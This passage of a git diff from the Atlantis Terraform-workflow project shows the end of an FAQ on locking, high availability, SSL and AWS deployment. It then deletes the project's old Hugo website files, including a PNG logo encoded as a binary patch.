Terraform locking only prevents two concurrent `terraform apply`'s from happening. + +Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands. + +**Q: How to run Atlantis in high availability mode? Does it need to be?** + +A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running. + +Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently. + +However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway. + +**Q: How to add SSL to Atlantis server?** + +A: First, you'll need to get a public/private key pair to serve over SSL. +These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags. +See `atlantis server --help` for more information. + +**Q: How can I get Atlantis up and running on AWS?** + +A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained. \ No newline at end of file diff --git a/website/src/archetypes/default.md b/website/src/archetypes/default.md deleted file mode 100644 index f5a9e450ff..0000000000 --- a/website/src/archetypes/default.md +++ /dev/null @@ -1,6 +0,0 @@ ---- -title: "{{ replace .TranslationBaseName "-" " " | title }}" -date: {{ .Date }} -draft: true ---- - diff --git a/website/src/archetypes/docs.md b/website/src/archetypes/docs.md deleted file mode 100644 index fa23e66f29..0000000000 --- a/website/src/archetypes/docs.md +++ /dev/null @@ -1,8 +0,0 @@ -+++ -title = "" -description = "" -weight = 20 -draft = false -bref = "" -toc = true -+++ diff --git a/website/src/config.toml b/website/src/config.toml deleted file mode 100644 index 7a7e264100..0000000000 --- a/website/src/config.toml +++ /dev/null @@ -1,22 +0,0 @@ -baseURL = "https://www.runatlantis.io" -languageCode = "en-us" -title = "Atlantis - A unified workflow for collaborating on Terraform through GitHub and GitLab" -theme = "kube" -description = "A unified workflow for collaborating on Terraform through GitHub and GitLab" -Paginate = 4 -[[menu.main]] - name = "Docs" - weight = -100 - url = "https://github.com/runatlantis/atlantis#getting-started" -[[menu.main]] - name = "Blog" - weight = -100 - url = "https://medium.com/runatlantis" -[[menu.main]] - name = "FAQ" - weight = -100 - url = "https://github.com/runatlantis/atlantis#faq" -[[menu.main]] - name = "Demo" - weight = 100 - url = "https://www.youtube.com/watch?v=TmIPWda0IKg" diff --git a/website/src/content/_index.md b/website/src/content/_index.md deleted file mode 100644 index 796172245b..0000000000 --- a/website/src/content/_index.md +++ /dev/null @@ -1,6 +0,0 @@ -+++ -description = "A unified workflow for collaborating on Terraform through GitHub and GitLab" -title = "Atlantis" -draft = false - -+++ diff --git a/website/src/static/.gitkeep b/website/src/static/.gitkeep deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/website/src/static/img/atlantis-highquality.png b/website/src/static/img/atlantis-highquality.png deleted file mode 100644 index 4fab9dd9627234e028fc354369562e2081f28960..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 21445 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 